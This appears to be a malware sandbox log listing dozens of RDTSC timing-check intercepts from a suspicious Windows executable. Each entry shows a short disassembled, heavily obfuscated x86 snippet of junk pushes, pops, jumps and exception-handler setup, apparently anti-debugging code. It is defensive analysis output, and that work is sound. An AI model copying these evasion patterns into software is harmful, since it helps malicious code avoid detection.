Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16B48B0 second address: 16B4945 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F22757AEC1Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jo 00007F22757AEC1Ch 0x00000011 ja 00007F22757AEC16h 0x00000017 jmp 00007F22757AEC1Ch 0x0000001c popad 0x0000001d nop 0x0000001e push ecx 0x0000001f xor dword ptr [ebp+1245684Dh], edi 0x00000025 pop edi 0x00000026 push 00000000h 0x00000028 push ecx 0x00000029 jmp 00007F22757AEC26h 0x0000002e pop ebx 0x0000002f mov edi, dword ptr [ebp+124777FCh] 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push ecx 0x0000003a call 00007F22757AEC18h 0x0000003f pop ecx 0x00000040 mov dword ptr [esp+04h], ecx 0x00000044 add dword ptr [esp+04h], 00000019h 0x0000004c inc ecx 0x0000004d push ecx 0x0000004e ret 0x0000004f pop ecx 0x00000050 ret 0x00000051 xor ebx, 19A43AD2h 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c jmp 00007F22757AEC21h 0x00000061 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16B4945 second address: 16B4949 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16B4949 second address: 16B494F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16B494F second address: 16B496A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2274C039A7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16B2A3C second address: 16B2AF0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F22757AEC1Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov edi, dword ptr [ebp+122D34EDh] 0x00000010 push dword ptr fs:[00000000h] 0x00000017 jl 00007F22757AEC1Ch 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 push 00000000h 0x00000026 push ecx 0x00000027 call 00007F22757AEC18h 0x0000002c pop ecx 0x0000002d mov dword ptr [esp+04h], ecx 0x00000031 add dword ptr [esp+04h], 00000017h 0x00000039 inc ecx 0x0000003a push ecx 0x0000003b ret 0x0000003c pop ecx 0x0000003d ret 0x0000003e call 00007F22757AEC1Ah 0x00000043 jmp 00007F22757AEC24h 0x00000048 pop ebx 0x00000049 push ebx 0x0000004a mov bl, cl 0x0000004c pop edi 0x0000004d mov eax, dword ptr [ebp+122D0201h] 0x00000053 sub dword ptr [ebp+122D2D53h], esi 0x00000059 push FFFFFFFFh 0x0000005b push 00000000h 0x0000005d push esi 0x0000005e call 00007F22757AEC18h 0x00000063 pop esi 0x00000064 mov dword ptr [esp+04h], esi 0x00000068 add dword ptr [esp+04h], 00000019h 0x00000070 inc esi 0x00000071 push esi 0x00000072 ret 0x00000073 pop esi 0x00000074 ret 0x00000075 xor dword ptr [ebp+1245646Ah], esi 0x0000007b push eax 0x0000007c push ebx 0x0000007d push eax 0x0000007e push edx 0x0000007f jne 00007F22757AEC16h 0x00000085 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16B5969 second address: 16B5973 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F2274C03996h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16B5973 second address: 16B59D8 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F22757AEC1Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov edi, dword ptr [ebp+122D1C51h] 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push esi 0x00000018 call 00007F22757AEC18h 0x0000001d pop esi 0x0000001e mov dword ptr [esp+04h], esi 0x00000022 add dword ptr [esp+04h], 0000001Ch 0x0000002a inc esi 0x0000002b push esi 0x0000002c ret 0x0000002d pop esi 0x0000002e ret 0x0000002f jmp 00007F22757AEC1Ah 0x00000034 mov edi, dword ptr [ebp+122D373Dh] 0x0000003a push 00000000h 0x0000003c xor bx, 6772h 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 jnl 00007F22757AEC1Ch 0x0000004a rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16B6942 second address: 16B6952 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2274C0399Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16B6952 second address: 16B6956 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16B7A23 second address: 16B7A73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F2274C0399Ch 0x0000000c jg 00007F2274C03996h 0x00000012 popad 0x00000013 mov dword ptr [esp], eax 0x00000016 sub dword ptr [ebp+1247BC5Fh], ebx 0x0000001c clc 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push ecx 0x00000022 call 00007F2274C03998h 0x00000027 pop ecx 0x00000028 mov dword ptr [esp+04h], ecx 0x0000002c add dword ptr [esp+04h], 00000017h 0x00000034 inc ecx 0x00000035 push ecx 0x00000036 ret 0x00000037 pop ecx 0x00000038 ret 0x00000039 mov di, dx 0x0000003c push 00000000h 0x0000003e mov dword ptr [ebp+122D2CAFh], edi 0x00000044 xchg eax, esi 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16B7A73 second address: 16B7A77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16B7A77 second address: 16B7A81 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F2274C03996h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16B7A81 second address: 16B7A9A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F22757AEC1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16B7A9A second address: 16B7A9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16B7A9E second address: 16B7AA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16B3AE3 second address: 16B3AFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2274C0399Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007F2274C03996h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16B4AF4 second address: 16B4B11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F22757AEC29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16B4B11 second address: 16B4BBE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jnl 00007F2274C03996h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F2274C03998h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 mov dword ptr [ebp+1245307Dh], ebx 0x0000002d push dword ptr fs:[00000000h] 0x00000034 sbb ebx, 3B6A6D4Ah 0x0000003a mov dword ptr fs:[00000000h], esp 0x00000041 cld 0x00000042 mov bl, E3h 0x00000044 mov eax, dword ptr [ebp+122D00B5h] 0x0000004a mov bx, di 0x0000004d push FFFFFFFFh 0x0000004f push 00000000h 0x00000051 push ebx 0x00000052 call 00007F2274C03998h 0x00000057 pop ebx 0x00000058 mov dword ptr [esp+04h], ebx 0x0000005c add dword ptr [esp+04h], 00000018h 0x00000064 inc ebx 0x00000065 push ebx 0x00000066 ret 0x00000067 pop ebx 0x00000068 ret 0x00000069 mov bx, 8DD7h 0x0000006d jmp 00007F2274C039A6h 0x00000072 nop 0x00000073 jmp 00007F2274C039A6h 0x00000078 push eax 0x00000079 pushad 0x0000007a push eax 0x0000007b push edx 0x0000007c pushad 0x0000007d popad 0x0000007e rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16B5B63 second address: 16B5B9B instructions: 0x00000000 rdtsc 0x00000002 js 00007F22757AEC27h 0x00000008 jmp 00007F22757AEC21h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 jmp 00007F22757AEC27h 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16B5B9B second address: 16B5C1A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F2274C03996h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c mov dword ptr [ebp+122D1B6Ah], ebx 0x00000012 push dword ptr fs:[00000000h] 0x00000019 sub dword ptr [ebp+122D2D4Ch], edi 0x0000001f mov dword ptr [ebp+122D2B75h], edi 0x00000025 mov dword ptr fs:[00000000h], esp 0x0000002c push 00000000h 0x0000002e push ebx 0x0000002f call 00007F2274C03998h 0x00000034 pop ebx 0x00000035 mov dword ptr [esp+04h], ebx 0x00000039 add dword ptr [esp+04h], 0000001Dh 0x00000041 inc ebx 0x00000042 push ebx 0x00000043 ret 0x00000044 pop ebx 0x00000045 ret 0x00000046 mov ebx, dword ptr [ebp+122D2ECFh] 0x0000004c push edi 0x0000004d mov edi, dword ptr [ebp+122D2E51h] 0x00000053 pop ebx 0x00000054 mov dword ptr [ebp+122D1BF8h], ecx 0x0000005a mov eax, dword ptr [ebp+122D06C1h] 0x00000060 add ebx, 1D04891Ah 0x00000066 push FFFFFFFFh 0x00000068 mov dword ptr [ebp+122D2D53h], ecx 0x0000006e nop 0x0000006f push eax 0x00000070 push edx 0x00000071 pushad 0x00000072 push eax 0x00000073 push edx 0x00000074 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16B5C1A second address: 16B5C21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16B5C21 second address: 16B5C2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F2274C03996h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16B7C0B second address: 16B7C11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16B7C11 second address: 16B7C16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16B8D38 second address: 16B8D3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16B8D3C second address: 16B8D46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16B8D46 second address: 16B8D4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16BADF6 second address: 16BADFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16C0ABA second address: 16C0AC6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jnl 00007F22757AEC16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16C0AC6 second address: 16C0AD8 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2274C0399Ch 0x00000008 jne 00007F2274C03996h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16C0AD8 second address: 16C0AE9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F22757AEC1Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1659226 second address: 165922F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push esi 0x00000007 pop esi 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 165922F second address: 165923B instructions: 0x00000000 rdtsc 0x00000002 jc 00007F22757AEC1Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 165923B second address: 1659243 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16C3AA8 second address: 16C3AAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16A10ED second address: 16A10F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16D4570 second address: 16D4574 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16D4D54 second address: 16D4D63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jng 00007F2274C0399Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16D4D63 second address: 16D4D7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 jl 00007F22757AEC1Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16D4ECB second address: 16D4ED9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16D4ED9 second address: 16D4EDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16D4EDD second address: 16D4F22 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2274C03996h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F2274C039A4h 0x0000000f popad 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push edx 0x00000015 pushad 0x00000016 jmp 00007F2274C0399Fh 0x0000001b ja 00007F2274C03996h 0x00000021 popad 0x00000022 pop edx 0x00000023 mov eax, dword ptr [eax] 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 push edx 0x00000029 pop edx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16D4F22 second address: 16D4F27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16D4F27 second address: 16D4F2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16D4F2C second address: 16D4F41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16D4F41 second address: 16D4F4B instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2274C0399Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16D4F4B second address: 14ED929 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 jmp 00007F22757AEC1Fh 0x0000000c push dword ptr [ebp+122D02C9h] 0x00000012 jmp 00007F22757AEC28h 0x00000017 call dword ptr [ebp+122D2B84h] 0x0000001d pushad 0x0000001e jmp 00007F22757AEC28h 0x00000023 xor eax, eax 0x00000025 mov dword ptr [ebp+122D1C73h], edi 0x0000002b mov edx, dword ptr [esp+28h] 0x0000002f cmc 0x00000030 jmp 00007F22757AEC1Ch 0x00000035 mov dword ptr [ebp+122D3585h], eax 0x0000003b pushad 0x0000003c mov ecx, dword ptr [ebp+122D3689h] 0x00000042 jp 00007F22757AEC29h 0x00000048 popad 0x00000049 mov esi, 0000003Ch 0x0000004e pushad 0x0000004f jmp 00007F22757AEC26h 0x00000054 mov dword ptr [ebp+122D1C73h], edx 0x0000005a popad 0x0000005b cld 0x0000005c add esi, dword ptr [esp+24h] 0x00000060 mov dword ptr [ebp+122D3226h], edx 0x00000066 lodsw 0x00000068 jnl 00007F22757AEC17h 0x0000006e add eax, dword ptr [esp+24h] 0x00000072 mov dword ptr [ebp+122D1C73h], ecx 0x00000078 mov ebx, dword ptr [esp+24h] 0x0000007c mov dword ptr [ebp+122D1C73h], ebx 0x00000082 nop 0x00000083 jmp 00007F22757AEC26h 0x00000088 push eax 0x00000089 jl 00007F22757AEC2Dh 0x0000008f push eax 0x00000090 push edx 0x00000091 jmp 00007F22757AEC1Fh 0x00000096 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16DAF21 second address: 16DAF2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007F2274C03996h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16D9C14 second address: 16D9C22 instructions: 0x00000000 rdtsc 0x00000002 je 00007F22757AEC18h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16D9C22 second address: 16D9C26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16DA166 second address: 16DA16A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16DA16A second address: 16DA1B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2274C039A1h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnp 00007F2274C039B2h 0x00000011 jmp 00007F2274C039A6h 0x00000016 jl 00007F2274C03996h 0x0000001c popad 0x0000001d push edx 0x0000001e jo 00007F2274C03998h 0x00000024 pushad 0x00000025 popad 0x00000026 pushad 0x00000027 jng 00007F2274C03996h 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16DA1B6 second address: 16DA1BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16DA301 second address: 16DA322 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2274C039A7h 0x00000009 popad 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16DA5E8 second address: 16DA5FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007F22757AEC16h 0x0000000c push edx 0x0000000d pop edx 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16DA5FE second address: 16DA630 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007F2274C039A8h 0x0000000e jp 00007F2274C03996h 0x00000014 pop esi 0x00000015 push eax 0x00000016 push edx 0x00000017 jg 00007F2274C03996h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16DA630 second address: 16DA634 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16DA634 second address: 16DA63E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16DA63E second address: 16DA642 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16DA642 second address: 16DA646 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16DA646 second address: 16DA64C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16DAA83 second address: 16DAA90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007F2274C03996h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16DAC2F second address: 16DAC33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16DAC33 second address: 16DAC37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16DAC37 second address: 16DAC41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1664F79 second address: 1664F8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F2274C0399Ah 0x0000000c rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16DF689 second address: 16DF68D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16DF836 second address: 16DF83D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16DFB15 second address: 16DFB1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16DFB1B second address: 16DFB1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16DFB1F second address: 16DFB36 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F22757AEC16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F22757AEC1Dh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16DFC61 second address: 16DFC69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1686B94 second address: 1686B9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1686B9A second address: 1686B9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
